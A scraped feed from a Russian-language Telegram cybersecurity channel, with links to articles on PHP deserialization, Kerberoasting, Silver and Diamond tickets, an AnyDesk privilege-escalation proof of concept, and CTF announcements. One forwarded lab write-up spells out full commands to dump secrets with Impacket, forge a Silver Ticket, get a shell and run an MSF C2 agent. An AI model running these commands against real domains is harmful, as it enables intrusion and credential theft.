Forwarded from wr3dmast3r vs pentest
Сегодня мы познакомимся с уязвимостью Insecure Deserialization на примере нескольких задач с PortSwigger и Standoff365 👨💻
В статье мы разберём, как устроены процессы сериализации и десериализации, а также напишем собственные эксплойты для реализации уязвимостей😻
Подробнее
В статье мы разберём, как устроены процессы сериализации и десериализации, а также напишем собственные эксплойты для реализации уязвимостей
Подробнее
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Небезопасная десериализация в PHP: Как создать собственный эксплойт
Привет, Хабр! Сегодня мы познакомимся с уязвимостями небезопасной десериализации в PHP , научимся писать эксплойты для эксплуатации уязвимости в рамках тестирований на проникновение и попробуем себя в...
В преддверии Нового года немножко подзабил на канал, извиняйте
Как и просили, завел репозиторий на Git'e со сборником полезной информации и разобранных атак в контексте purple team👾
Не Notion, конечно, но кому щас легко...
Напомню, что он, на данный момент, пустоват, но это лишь дело времени
Если есть интересные темы для разбора- пишите, обязательно раскурим
Ссылка: https://github.com/artroneee/Cyber-Security-Collection
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - artroneee/Cyber-Security-Collection: Cyber Security Collection
Cyber Security Collection. Contribute to artroneee/Cyber-Security-Collection development by creating an account on GitHub.
Путь до хакера | Cyber security pinned «👋 Привет👋 В преддверии Нового года немножко подзабил на канал, извиняйте🔫 Как и просили, завел репозиторий на Git'e со сборником полезной информации и разобранных атак в контексте purple team👾 Не Notion, конечно, но кому щас легко... Напомню, что он, на…»
Вот и подошел к своему завершению 2024 год. Для кого-то он был плохим, для кого-то хорошим, но, в любом случае, он был наполнен разными событиями и эмоциями
В следующем 2025 году я бы хотел пожелать всем нам выдержки и мотивации для достижения своих целей.
С наступающим!
Please open Telegram to view this post
VIEW IN TELEGRAM
Атака Kerberoasting позволяет злоумышленнику захватить сервисную УЗ путём запроса TGS с указанием имени этой сервисной УЗ и последующим брутфорсом билета.
А можно ли как-то провести атаку, не имея в арсенале доступ ни к одной доменной УЗ? Обязательно выясним
Читать: https://habr.com/ru/articles/875694/
P.S. Все статьи, которые будут выходить на Хабре, добавляются в Git. Не забывайте про него😉
Please open Telegram to view this post
VIEW IN TELEGRAM
Не ждали? А я сделал!
А если серьезно, то порешаем практические задания для блюшников с платформы Standoff. Разбор заданий для ивента УК Сити (2022).
Я постарался максимально отразить своё мышление при расследованиях, показать какие-то фишечки и просто сделать обзор на PT SIEM и к нему прилегающее.
Надеюсь, вам понравится такой формат
Читать: https://habr.com/ru/articles/877404/
Также в Git добавил новую папку с райтапами. Пользуйтесь
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Следствие ведут Эникейщики: артефакты, экспертиза и пицца в 3 ночи
Привет! Сегодня разберем практические задания для блюшников с платформы Standoff. Разбор заданий будет для ивента УК Сити (2022). Подробнее Легенда Основная деятельность УК City в Государстве F...
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RedTeam brazzers (Миша)
Всем привет!
Недавно вышел интересный разбор LPE-уязвимости CVE-2024-12754 через AnyDesk. Разбор подробный, однако без POC. Поэтому надо исправлять :)
Сам механизм повышения привилегий основывается на возможности контроля целевого файла, который копируется в доступную для чтения низкопривилегированного пользователя директорию.
Нам остается лишь заставить AnyDesk, работающий от лица системы, прочитать файл, недоступный нам. Автор в статье использует чтение SAM из Shadow Copy.
Разработку, тестирование и отладку я проводил на AnyDesk версии 8.0.10, которую качал отсюда.
Вы можете сами попробовать POCнуть эту уязвимость, используя набор инструментов от Google Project Zero.
Моя реализация доступна здесь. Она осуществляет чтение произвольного файла, после чего копирует его содержимое на рабочий стол текущему пользователю.
Хоть Windows и активно продвигает механизм защиты, именуемый RedirectionTrust, предотвращающий переход по ссылкам, созданными не администраторами, однако эта митигация зачастую не распространяется на службы, которые были разработаны сторонними компаниями. Причина проста: разработчики не знают о ней и забывают применить, отсюда и появляется возможность LPE.
Демо можно посмотреть здесь
Недавно вышел интересный разбор LPE-уязвимости CVE-2024-12754 через AnyDesk. Разбор подробный, однако без POC. Поэтому надо исправлять :)
Сам механизм повышения привилегий основывается на возможности контроля целевого файла, который копируется в доступную для чтения низкопривилегированного пользователя директорию.
Нам остается лишь заставить AnyDesk, работающий от лица системы, прочитать файл, недоступный нам. Автор в статье использует чтение SAM из Shadow Copy.
Разработку, тестирование и отладку я проводил на AnyDesk версии 8.0.10, которую качал отсюда.
Вы можете сами попробовать POCнуть эту уязвимость, используя набор инструментов от Google Project Zero.
Моя реализация доступна здесь. Она осуществляет чтение произвольного файла, после чего копирует его содержимое на рабочий стол текущему пользователю.
Хоть Windows и активно продвигает механизм защиты, именуемый RedirectionTrust, предотвращающий переход по ссылкам, созданными не администраторами, однако эта митигация зачастую не распространяется на службы, которые были разработаны сторонними компаниями. Причина проста: разработчики не знают о ней и забывают применить, отсюда и появляется возможность LPE.
Демо можно посмотреть здесь
Видели уже???
https://www.securitylab.ru/news/556556.php
После regreSSHion пошел какой-то тренд на вулны с SSH🔫
https://www.securitylab.ru/news/556556.php
После regreSSHion пошел какой-то тренд на вулны с SSH
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Критический баг в OpenSSH позволяет перехватывать SSH-сессии
Ваши SSH-сессии могут быть перехвачены, если немедленно не принять меры.
Forwarded from FEFU CTF💻
Команда EXE.1sior – 🥇 место на киберучениях, прошедших в рамках уральского форума «Кибербезопасность в финансах»!
В течение нескольких часов ребята, образовавшие своего рода Purple Team, расследовали инциденты информационной безопасности в виртуальном городе Неонополис.
Им предстояло разобраться с самыми разными недопустимыми событиями — от изменения цен на билеты в кинотеатре до сложной многоэтапной атаки на банкомат с проведением несанкционированного перевода.
Поздравляем с заслуженной победой!🎉
В течение нескольких часов ребята, образовавшие своего рода Purple Team, расследовали инциденты информационной безопасности в виртуальном городе Неонополис.
Им предстояло разобраться с самыми разными недопустимыми событиями — от изменения цен на билеты в кинотеатре до сложной многоэтапной атаки на банкомат с проведением несанкционированного перевода.
Поздравляем с заслуженной победой!
Please open Telegram to view this post
VIEW IN TELEGRAM
Silver Ticket — не просто атака, а теневая операция в сердце Active Directory.
Читать: https://habr.com/ru/articles/886584/
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RDG CTF (Ilya)
Соревнования пройдут в двух зачетах: студенческом и школьном.
Призёры среди школьников смогут получить дополнительные баллы при поступлении в ДВФУ на направления «Информационная безопасность» и «Компьютерная безопасность»
Если вы не являетесь студентом, представляете разные вузы или обучаетесь в вузе за пределами Дальнего Востока, вы можете принять участие онлайн вне зачета.
👥 Состав команды: до 7 человек. Количество команд не ограничено.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Purple Chronicles (Feyd-Rautha Harkonnen)
В ходе решения одной из сетей на известной платформе может сложиться ситуация, с которой столкнулся я.
Имея привилегированный доступ к серверу, который впоследствии будет использоваться для Remote NTLM Relay, я без задней мысли отключил службы
NetLogon
, LanManServer
и LanManWorkstation
и перезагрузил машину, забыв закрепиться на ней встроенными средствами фрэймворка постэксплуатации.Сделал я это следующим образом:
sc stop netlogon
sc stop lanmanserver
sc config lanmanserver start= disabled
sc stop lanmanworkstation
sc config lanmanworkstation start= disabled
После перезагрузки хоста я удостоверился, что порт 445 не прослушивается сервером (
nmap -p 445 -sT -Pn <serverIP>
), после чего решил продолжить атаку, но столкнулся с очевидной проблемой: я не могу пройти аутентификацию на сервере и, следовательно, запустить бинарный файл, необходимый для организации портфорвардинга.Имеем 2 проблемы:
1) Не работают службы
NetLogon
, LanManServer
и LanManWorkstation
, из-за чего не получится пройти аутентификацию на целевом сервере при помощи NTLM;2) Не работает SMB-порт, необходимый для работы большинства утилит из набора Impacket.
Что же делать?
Решение довольно очевидное. Вместо NTLM можно использовать Kerberos, так как мы находимся в доменной инфраструктуре. Не зря же после получения системного доступа к атакуемому серверу мы дампили его LSA-секреты?
А вместо стандартных скриптов из набора Impacket можно использовать их "pro вариации", которые не требуют доступа к 445 порту целевого сервера.
Начнем атаку!
Шаг 1. Silver Ticket🎫
Первый шаг показан в демонстративных целях, чтобы видеть хэш пароля учетной записи атакуемого сервера. Напомню, что его мы получили ранее путем дампа LSA-секретов на самом сервере.
proxychains impacket-secretsdump holo.live/Administrator@10.201.126.30 -hashes :<redacted> -just-dc-user 'PC-FILESRV01$'
...
PC-FILESRV01$:1120:aad3b435b51404eeaad3b435b51404ee:e66f5cf1a026516d1d2220130d8d13c4
Для осуществления атаки нам необходим SID домена, который мы получим с использованием скрипта
impacket-lookupsid
из набора Impacket (в данном случае используем технику Pass-the-Hash в отношении контроллера домена):proxychains impacket-lookupsid HOLO.LIVE/'PC-FILESRV01$'@10.201.126.30 -hashes :e66f5cf1a026516d1d2220130d8d13c4
Получаем SID домена: S-1-5-21-471847105-3603022926-1728018720
После получения SID начинаем крафтить Silver Ticket, чтобы получить привилегированный доступ к целевому серверу. Путь до полученного тикета записываем в переменную окружения
KRB5CCNAME
:proxychains impacket-ticketer -nthash e66f5cf1a026516d1d2220130d8d13c4 -domain-sid S-1-5-21-471847105-3603022926-1728018720 -dc-ip 10.201.126.30 -domain holo.live -spn HOST/PC-FILESRV01.holo.live 'watamet'
export KRB5CCNAME=watamet.ccache
Шаг 2. ATExec Pro
После этого уже при помощи известного нам
atexec-pro.py
и полученного билета получаем доступ к целевому серверу и запускаем наш C2-агент (для примера здесь используется MSF): proxychains python3 atexec-pro.py PC-FILESRV01.holo.live -k -no-pass -dc-ip 10.201.126.30
Внутри шелла:
ATShell (@PC-FILESRV01.holo.live)> upload /root/THM/Holo/binaries/msf_win_x64.exe C:\Windows\Tasks\msf.exe
ATShell (@PC-FILESRV01.holo.live)> C:\Windows\Tasks\msf.exe
Поэтапно те же действия можно видеть на приложенных скриншотах.
1) Получение SID домена при помощи
impacket-lookupsid
;2) Создание Silvet Ticket при помощи
impacket-ticketer
для привилегированного доступа к целевому хосту;3) Получение доступа к целевому хосту при помощи
atexec-pro.py
с использованием ранее полученного билета (обращаю внимание на лог ProxyChains, где отсутствует коннект до 445 порта).Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
артрончик на пути к мировому господству😂
По cyberdefenders райтапы интересно будет вам читать? хотим?
По cyberdefenders райтапы интересно будет вам читать? хотим?
Please open Telegram to view this post
VIEW IN TELEGRAM
Вы уже разобрали Silver и Golden Ticket? Это лишь прелюдия.
Diamond & Sapphire — последние «сокровища» в цепочке уязвимостей с билетами.
В статье рассмотрим:
Читать: https://habr.com/ru/articles/891620/
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM